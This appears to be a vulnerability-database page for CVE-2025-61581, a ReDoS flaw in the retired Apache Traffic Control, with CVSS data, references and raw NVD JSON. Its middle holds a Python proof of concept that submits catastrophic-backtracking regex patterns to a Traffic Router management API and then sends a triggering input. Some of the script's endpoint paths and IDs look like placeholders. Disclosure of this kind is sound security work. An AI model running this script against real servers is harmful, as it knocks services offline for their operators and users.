Security Vulnerability Report
CVE-2025-61581 CVSS 7.5 HIGH

CVE-2025-61581

Published: 2025-10-16 09:15:36
Last Modified: 2025-11-04 22:16:36

Description

** UNSUPPORTED WHEN ASSIGNED ** Inefficient Regular Expression Complexity vulnerability in Apache Traffic Control. This issue affects Apache Traffic Control: all versions. People with access to the management interface of the Traffic Router component could specify malicious patterns and cause unavailability. As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:apache:traffic_control:*:*:*:*:*:*:*:* - VULNERABLE
Apache Traffic Control, all versions (project retired)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-61581 PoC - Apache Traffic Control ReDoS Attack
# This PoC demonstrates the ReDoS vulnerability in Traffic Router's regex handling
import requests
import re
import time

# Target Traffic Router management interface
TARGET_URL = "http://target-traffic-router:8080"
AUTH_TOKEN = "your_auth_token"  # Required: access to management interface

# Malicious regex patterns that cause catastrophic backtracking
MALICIOUS_PATTERNS = [
    # Pattern 1: Nested quantifiers (a+)+
    r"^(a+)+$",
    # Pattern 2: Alternation with overlap (a|a)*
    r"^(a|a)*$",
    # Pattern 3: Complex nested groups
    r"^((a+)+)+$",
    # Pattern 4: Greedy quantifier with alternation
    r"^(a|aa)+$",
]

# Input string designed to trigger maximum backtracking
EVIL_INPUT = "a" * 50 + "!"  # Long string of 'a' followed by non-matching char


def submit_malicious_regex(pattern):
    """Submit a malicious regex pattern to Traffic Router management API"""
    endpoint = f"{TARGET_URL}/api/1.2/patterns"
    headers = {
        "Authorization": f"Bearer {AUTH_TOKEN}",
        "Content-Type": "application/json",
    }
    payload = {
        "pattern": pattern,
        "type": "REGEX",
        "description": "malicious_pattern",
    }
    response = requests.post(endpoint, json=payload, headers=headers)
    return response.status_code == 200


def trigger_regex_evaluation(pattern_id):
    """Trigger regex evaluation by sending matching request"""
    # Send request that will be evaluated against the malicious pattern
    test_url = f"{TARGET_URL}/patterns/test"
    params = {
        "pattern_id": pattern_id,
        "request_uri": EVIL_INPUT,
    }
    start = time.time()
    try:
        response = requests.get(test_url, params=params, timeout=300)
        elapsed = time.time() - start
        print(f"Request completed in {elapsed:.2f}s")
    except requests.exceptions.Timeout:
        elapsed = time.time() - start
        print(f"Request timed out after {elapsed:.2f}s - DoS confirmed!")


if __name__ == "__main__":
    # Step 1: Submit malicious regex pattern
    for pattern in MALICIOUS_PATTERNS:
        print(f"Submitting pattern: {pattern}")
        if submit_malicious_regex(pattern):
            print("Pattern submitted successfully")
            # Step 2: Trigger evaluation with evil input
            trigger_regex_evaluation(pattern_id="latest")
            break

References

https://lists.apache.org/thread/mx2jxgnlop2f4vbqnvmrldh4pqmobxvp (Mailing List, Vendor Advisory)
http://www.openwall.com/lists/oss-security/2025/10/16/3

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-61581",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-16T09:15:35.670",
    "lastModified": "2025-11-04T22:16:36.130",
    "vulnStatus": "Modified",
    "cveTags": [
      {
        "sourceIdentifier": "[email protected]",
        "tags": ["unsupported-when-assigned"]
      }
    ],
    "descriptions": [
      {
        "lang": "en",
        "value": "** UNSUPPORTED WHEN ASSIGNED ** Inefficient Regular Expression Complexity vulnerability in Apache Traffic Control.\n\nThis issue affects Apache Traffic Control: all versions.\n\nPeople with access to the management interface of the Traffic Router component could specify malicious patterns and cause unavailability.\n\nAs this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users.\n\nNOTE: This vulnerability only affects products that are no longer supported by the maintainer."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-1333"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:apache:traffic_control:*:*:*:*:*:*:*:*",
                "versionEndIncluding": "8.0.2",
                "matchCriteriaId": "88B9FDA7-BEEC-4CD1-B17C-DBBFBB96B674"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://lists.apache.org/thread/mx2jxgnlop2f4vbqnvmrldh4pqmobxvp",
        "source": "[email protected]",
        "tags": ["Mailing List", "Vendor Advisory"]
      },
      {
        "url": "http://www.openwall.com/lists/oss-security/2025/10/16/3",
        "source": "af854a3a-2127-422b-91ae-364da2661108"
      }
    ]
  }
}